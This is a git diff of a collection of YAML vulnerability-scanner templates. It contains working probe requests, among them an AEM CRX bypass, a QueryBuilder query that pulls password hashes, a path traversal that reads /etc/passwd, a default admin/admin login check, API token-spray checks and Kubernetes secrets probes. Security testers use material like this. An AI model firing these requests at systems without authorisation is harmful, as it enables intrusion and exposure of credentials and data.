diff --git a/date.txt b/date.txt index 3745c09494..bd531cb555 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240929 +20240930 diff --git a/poc.txt b/poc.txt index 1f0689d002..2e782d52bc 100644 --- a/poc.txt +++ b/poc.txt @@ -85415,6 +85415,7 @@ ./poc/other/provider-path.yaml ./poc/other/proxmox-panel.yaml ./poc/other/proxmox-ve.yaml +./poc/other/proxy-checker.yaml ./poc/other/prtg-workflow.yaml ./poc/other/prtg_network_monitor.yaml ./poc/other/prvpl.yaml diff --git a/poc/adobe/adobe-connect-central-login.yaml b/poc/adobe/adobe-connect-central-login.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/adobe/adobe-connect-central-login.yaml +++ b/poc/adobe/adobe-connect-central-login.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-username-exposure.yaml b/poc/adobe/adobe-connect-username-exposure.yaml index 088b39ad5e..e47b4fe88b 100644 --- a/poc/adobe/adobe-connect-username-exposure.yaml +++ b/poc/adobe/adobe-connect-username-exposure.yaml @@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/adobe/aem-crx-bypass.yaml b/poc/adobe/aem-crx-bypass.yaml index 6607f936be..a6187d442a 100644 --- a/poc/adobe/aem-crx-bypass.yaml +++ b/poc/adobe/aem-crx-bypass.yaml @@ -1,10 +1,12 @@ id: aem-crx-bypass + info: author: dhiyaneshDK name: AEM CRX Bypass severity: critical reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ tags: aem + requests: - raw: - | @@ -12,11 +14,13 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate + - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate + matchers-condition: and matchers: - type: word @@ -26,10 +30,12 @@ requests: - 'downloadName' - 'acHandling' condition: and + - type: word part: header words: - 'application/json' + - type: status status: - 200 diff --git a/poc/adobe/aem-default-get-servlet-139.yaml b/poc/adobe/aem-default-get-servlet-139.yaml index 274b345439..7186c2256f 100644 --- a/poc/adobe/aem-default-get-servlet-139.yaml +++ b/poc/adobe/aem-default-get-servlet-139.yaml @@ -1,26 +1,15 @@ id: aem-default-get-servlet - info: - name: AEM DefaultGetServlet author: DhiyaneshDk + name: AEM DefaultGetServlet severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + requests: - method: GET path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - '{{BaseURL}}/.json' - '{{BaseURL}}/.1.json' - '{{BaseURL}}/....4.2.1....json' diff --git a/poc/adobe/aem-detection-146.yaml b/poc/adobe/aem-detection-146.yaml index 421bb35f54..bb3d7e0753 100644 --- a/poc/adobe/aem-detection-146.yaml +++ b/poc/adobe/aem-detection-146.yaml @@ -2,9 +2,8 @@ id: aem-detection info: name: Favicon based AEM Detection - severity: info author: shifacyclewala,hackergautam - tags: aem,favicon,tech + severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a @@ -13,6 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe requests: - method: GET @@ -25,4 +25,4 @@ requests: matchers: - type: dsl dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml index 7cac692c6b..b37f3f8d94 100644 --- a/poc/adobe/aem-groovyconsole-154.yaml +++ b/poc/adobe/aem-groovyconsole-154.yaml @@ -1,19 +1,22 @@ id: aem-groovyconsole info: - name: AEM Groovy console exposed - author: d3sca + name: AEM Groovy Console Discovery + author: Dheerajmadhukar severity: critical - description: Groovy console is exposed. - tags: aem + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/groovyconsole.html" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -26,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-hash-querybuilder-157.yaml b/poc/adobe/aem-hash-querybuilder-157.yaml index 50ae6efbd4..9547fb1a96 100644 --- a/poc/adobe/aem-hash-querybuilder-157.yaml +++ b/poc/adobe/aem-hash-querybuilder-157.yaml @@ -1,12 +1,11 @@ id: aem-hash-querybuilder - info: - author: DhiyaneshDk name: Query hashed password via QueryBuilder Servlet + author: DhiyaneshDk severity: medium - reference: https://twitter.com/AEMSecurity/status/1372392101829349376 + reference: + - https://twitter.com/AEMSecurity/status/1372392101829349376 tags: aem - requests: - raw: - | @@ -15,15 +14,13 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"success":true' - 'rep:password' - condition: and \ No newline at end of file + condition: and diff --git a/poc/adobe/aem-querybuilder-internal-path-read.yaml b/poc/adobe/aem-querybuilder-internal-path-read.yaml index 5e8033b220..f088c74a61 100644 --- a/poc/adobe/aem-querybuilder-internal-path-read.yaml +++ b/poc/adobe/aem-querybuilder-internal-path-read.yaml @@ -1,10 +1,13 @@ id: aem-querybuilder-internal-path-read + info: author: DhiyaneshDk name: AEM QueryBuilder Internal Path Read severity: medium reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 tags: aem + + requests: - method: GET path: @@ -12,13 +15,16 @@ requests: - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'jcr:path' - 'success' - condition: and + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-json-servlet-187.yaml b/poc/adobe/aem-querybuilder-json-servlet-187.yaml index 18210457c8..48870c0894 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-187.yaml +++ b/poc/adobe/aem-querybuilder-json-servlet-187.yaml @@ -18,11 +18,6 @@ requests: status: - 200 - - type: word - words: - - "application/json" - part: header - - type: word words: - 'success' diff --git a/poc/adobe/aem-userinfo-servlet.yaml b/poc/adobe/aem-userinfo-servlet.yaml index 0fe58a4195..01684b7d96 100644 --- a/poc/adobe/aem-userinfo-servlet.yaml +++ b/poc/adobe/aem-userinfo-servlet.yaml @@ -4,8 +4,8 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. - tags: aem + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem,bruteforce requests: @@ -19,7 +19,13 @@ requests: - 200 - type: word + part: body words: - - 'userName' - - 'userID' + - '"userID":' + - '"userName":' condition: and + + - type: word + part: header + words: + - 'application/json' diff --git a/poc/apache/default-apache-test-page-6816.yaml b/poc/apache/default-apache-test-page-6816.yaml index d76fd5ac60..ade74d648c 100644 --- a/poc/apache/default-apache-test-page-6816.yaml +++ b/poc/apache/default-apache-test-page-6816.yaml @@ -4,8 +4,8 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + metadata: + shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache requests: diff --git a/poc/api/Google-api.yaml b/poc/api/Google-api.yaml index b5b0737aa7..1242ce0367 100644 --- a/poc/api/Google-api.yaml +++ b/poc/api/Google-api.yaml @@ -1,12 +1,15 @@ id: google-api-key-file + info: name: Google API key author: gaurang severity: info tags: token,file,google + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/api/alfacgiapi-wordpress-257.yaml b/poc/api/alfacgiapi-wordpress-257.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-257.yaml +++ b/poc/api/alfacgiapi-wordpress-257.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/api/api-abstractapi.yaml b/poc/api/api-abstractapi.yaml index b6eecac2ef..d817d4faeb 100644 --- a/poc/api/api-abstractapi.yaml +++ b/poc/api/api-abstractapi.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - '"total_count":' - - '"limit":' - - '"offset":' + - '"name_local":' + - '"location":' + - '"date_year":' condition: and diff --git a/poc/api/api-abuseipdb.yaml b/poc/api/api-abuseipdb.yaml index 077084fa93..ca83d86700 100644 --- a/poc/api/api-abuseipdb.yaml +++ b/poc/api/api-abuseipdb.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true diff --git a/poc/api/api-bible.yaml b/poc/api/api-bible.yaml index 313d9d6612..9e47277d90 100644 --- a/poc/api/api-bible.yaml +++ b/poc/api/api-bible.yaml @@ -4,9 +4,10 @@ info: name: API.Bible API Test author: daffainfo severity: info + description: Everything you need from the Bible in one discoverable place reference: - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md + - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible tags: token-spray,bible self-contained: true diff --git a/poc/api/api-bravenewcoin.yaml b/poc/api/api-bravenewcoin.yaml index 1fa0c10281..ef81f36b71 100644 --- a/poc/api/api-bravenewcoin.yaml +++ b/poc/api/api-bravenewcoin.yaml @@ -4,10 +4,9 @@ info: name: Brave New Coin API Test author: daffainfo severity: info - description: Real-time and historic crypto data from more than 200+ exchanges reference: - https://bravenewcoin.com/developers - - https://github.com/daffainfo/all-about-apikey/tree/main/brave-new-coin + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md tags: token-spray,bravenewcoin self-contained: true diff --git a/poc/api/api-buildkite-402.yaml b/poc/api/api-buildkite-402.yaml index 77e8e1e677..7855f0b53b 100644 --- a/poc/api/api-buildkite-402.yaml +++ b/poc/api/api-buildkite-402.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buildkite +self-contained: true requests: - method: GET path: @@ -15,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/poc/api/api-circleci-405.yaml b/poc/api/api-circleci-405.yaml index 281d22b656..b01e427381 100644 --- a/poc/api/api-circleci-405.yaml +++ b/poc/api/api-circleci-405.yaml @@ -5,14 +5,18 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: token-spray,circle,circleci + tags: token-spray,circleci +self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/poc/api/api-covalent.yaml b/poc/api/api-covalent.yaml index 159aca5e52..9fb44a3d2e 100644 --- a/poc/api/api-covalent.yaml +++ b/poc/api/api-covalent.yaml @@ -4,9 +4,10 @@ info: name: Covalent API Test author: daffainfo severity: info + description: https://github.com/daffainfo/all-about-apikey/tree/main/covalent reference: - https://www.covalenthq.com/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md + - https://github.com/daffainfo/all-about-apikey/tree/main/covalent tags: token-spray,covalent self-contained: true diff --git a/poc/api/api-dropbox-418.yaml b/poc/api/api-dropbox-418.yaml index 29679e2b2f..cc14c60421 100644 --- a/poc/api/api-dropbox-418.yaml +++ b/poc/api/api-dropbox-418.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,dropbox +self-contained: true requests: - method: POST path: @@ -15,6 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"account_id":' + - '"email":' + condition: and diff --git a/poc/api/api-festivo.yaml b/poc/api/api-festivo.yaml index 3911ce2636..30f758bdf2 100644 --- a/poc/api/api-festivo.yaml +++ b/poc/api/api-festivo.yaml @@ -4,10 +4,9 @@ info: name: Festivo API Test author: daffainfo severity: info - description: Fastest and most advanced public holiday and observance service on the market reference: - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md tags: token-spray,festivo self-contained: true diff --git a/poc/api/api-harvardart.yaml b/poc/api/api-harvardart.yaml index 7b2f15b76f..e9f965433e 100644 --- a/poc/api/api-harvardart.yaml +++ b/poc/api/api-harvardart.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md tags: token-spray,harvardart self-contained: true diff --git a/poc/api/api-improvmx.yaml b/poc/api/api-improvmx.yaml index 1b6f7e7986..fb6c00f0d9 100644 --- a/poc/api/api-improvmx.yaml +++ b/poc/api/api-improvmx.yaml @@ -4,9 +4,10 @@ info: name: ImprovMX API Test author: daffainfo severity: info + description: API for free email forwarding service reference: - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx tags: token-spray,improvmx self-contained: true diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml index 40ac71ae96..1175f1b8b3 100644 --- a/poc/api/api-instatus.yaml +++ b/poc/api/api-instatus.yaml @@ -4,9 +4,10 @@ info: name: Instatus API Test author: daffainfo severity: info + description: Post to and update maintenance and incidents on your status page through an HTTP REST API reference: - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md + - https://github.com/daffainfo/all-about-apikey/tree/main/instatus tags: token-spray,instatus self-contained: true diff --git a/poc/api/api-mailchimp-454.yaml b/poc/api/api-mailchimp-454.yaml index 5232ddda97..9d7073e46c 100644 --- a/poc/api/api-mailchimp-454.yaml +++ b/poc/api/api-mailchimp-454.yaml @@ -3,11 +3,10 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - severity: info reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info tags: token-spray,mailchimp -self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/poc/api/api-malwarebazaar.yaml b/poc/api/api-malwarebazaar.yaml index ce99bd0a43..f261796b92 100644 --- a/poc/api/api-malwarebazaar.yaml +++ b/poc/api/api-malwarebazaar.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md tags: token-spray,malwarebazaar self-contained: true diff --git a/poc/api/api-pastebin.yaml b/poc/api/api-pastebin.yaml index 143f639fb1..ab46ebbc09 100644 --- a/poc/api/api-pastebin.yaml +++ b/poc/api/api-pastebin.yaml @@ -4,9 +4,10 @@ info: name: Pastebin API Test author: daffainfo severity: info + description: Plain Text Storage reference: - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin tags: token-spray,pastebin self-contained: true diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker.yaml index 1f7e7007e0..c52e04af9a 100644 --- a/poc/api/api-pivotaltracker.yaml +++ b/poc/api/api-pivotaltracker.yaml @@ -7,7 +7,6 @@ info: severity: info tags: token-spray,pivotaltracker -self-contained: true requests: - method: GET path: @@ -21,4 +20,3 @@ requests: negative: true words: - 'invalid_authentication' - - 'unauthenticated' diff --git a/poc/api/api-quip.yaml b/poc/api/api-quip.yaml index 70239345aa..bb21c29c72 100644 --- a/poc/api/api-quip.yaml +++ b/poc/api/api-quip.yaml @@ -4,10 +4,9 @@ info: name: Quip API Test author: daffainfo severity: info - description: File Sharing and Storage for groups reference: - https://quip.com/dev/automation/documentation - - https://github.com/daffainfo/all-about-apikey/tree/main/quip + - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md tags: token-spray,quip self-contained: true diff --git a/poc/api/api-urlscan.yaml b/poc/api/api-urlscan.yaml index bcb14d8c1c..93d5b196db 100644 --- a/poc/api/api-urlscan.yaml +++ b/poc/api/api-urlscan.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://urlscan.io/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md tags: token-spray,urlscan self-contained: true diff --git a/poc/api/apisix-default-login-490.yaml b/poc/api/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/api/apisix-default-login-490.yaml +++ b/poc/api/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index b60cfd2026..897c70d812 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml @@ -5,14 +5,11 @@ info: author: Podalirius severity: info description: ArcGIS documents were discovered. - tags: api,arcgis,cms reference: - https://enterprise.arcgis.com/en/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + tags: api,arcgis,cms requests: - method: GET diff --git a/poc/api/bems-api-lfi.yaml b/poc/api/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 --- a/poc/api/bems-api-lfi.yaml +++ b/poc/api/bems-api-lfi.yaml @@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/api/burp-api-detect.yaml b/poc/api/burp-api-detect.yaml index d1c703aa98..68a7000ee7 100644 --- a/poc/api/burp-api-detect.yaml +++ b/poc/api/burp-api-detect.yaml @@ -4,9 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech + reference: https://portswigger.net/burp/documentation/enterprise/api-reference requests: - method: GET diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index 4edf1734a5..da88f8d2fa 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml @@ -1,15 +1,10 @@ id: gitlab-api-user-enum - info: - name: GitLab - User Information Disclosure Via Open API author: Suman_Kar + name: GitLab - User Information Disclosure Via Open API severity: medium - reference: - - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 - metadata: - shodan-query: http.title:"GitLab" + reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 tags: gitlab,enum,misconfig,disclosure - requests: - raw: - | @@ -17,10 +12,8 @@ requests: Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} - payloads: uid: helpers/wordlists/numbers.txt - stop-at-first-match: true matchers-condition: and matchers: @@ -31,12 +24,10 @@ requests: - "username.*" - "id.*" - "name.*" - - type: word part: header words: - "application/json" - - type: status status: - 200 diff --git a/poc/api/google-api-key.yaml b/poc/api/google-api-key.yaml index 1798c569c3..d8a2a240cd 100644 --- a/poc/api/google-api-key.yaml +++ b/poc/api/google-api-key.yaml @@ -1,19 +1,24 @@ -id: google-api-key - -info: - name: Google API Key - author: Swissky - severity: info - tags: exposure,token,google - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/hopfully404" - - extractors: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" +id: google-api-key + +info: + name: Google API Key + author: Swissky + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" + + extractors: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/poc/api/kube-api-namespaces.yaml b/poc/api/kube-api-namespaces.yaml index 8d0b0d8792..b4e820623c 100644 --- a/poc/api/kube-api-namespaces.yaml +++ b/poc/api/kube-api-namespaces.yaml @@ -1,26 +1,22 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/kube-api-secrets.yaml b/poc/api/kube-api-secrets.yaml index cafadcbdf1..e946725992 100644 --- a/poc/api/kube-api-secrets.yaml +++ b/poc/api/kube-api-secrets.yaml @@ -1,19 +1,23 @@ id: kube-api-secrets + info: name: Kube API Secrets author: sharath severity: info description: Scans for kube secrets endpoint tags: tech,k8s,kubernetes,devops,kube + requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/secrets" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/api/sendgrid-api-key-10142.yaml b/poc/api/sendgrid-api-key-10142.yaml index cb06fc3ffc..88f920b11b 100644 --- a/poc/api/sendgrid-api-key-10142.yaml +++ b/poc/api/sendgrid-api-key-10142.yaml @@ -1,11 +1,9 @@ id: sendgrid-api-key - info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token,sendgrid - + tags: exposure,token requests: - method: GET path: diff --git a/poc/api/strapi-cms-detect.yaml b/poc/api/strapi-cms-detect.yaml index c08945df08..530e120e7e 100644 --- a/poc/api/strapi-cms-detect.yaml +++ b/poc/api/strapi-cms-detect.yaml @@ -1,5 +1,4 @@ id: strapi-cms-detect - info: name: Strapi CMS detect author: cyllective,daffainfo,idealphase @@ -8,12 +7,10 @@ info: reference: - https://github.com/strapi/strapi tags: tech,strapi,cms - requests: - method: GET path: - "{{BaseURL}}/admin/init" - matchers-condition: and matchers: - type: word @@ -23,11 +20,9 @@ requests: - '"uuid"' - '"hasAdmin"' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/api/swagger-api-10593.yaml b/poc/api/swagger-api-10593.yaml index 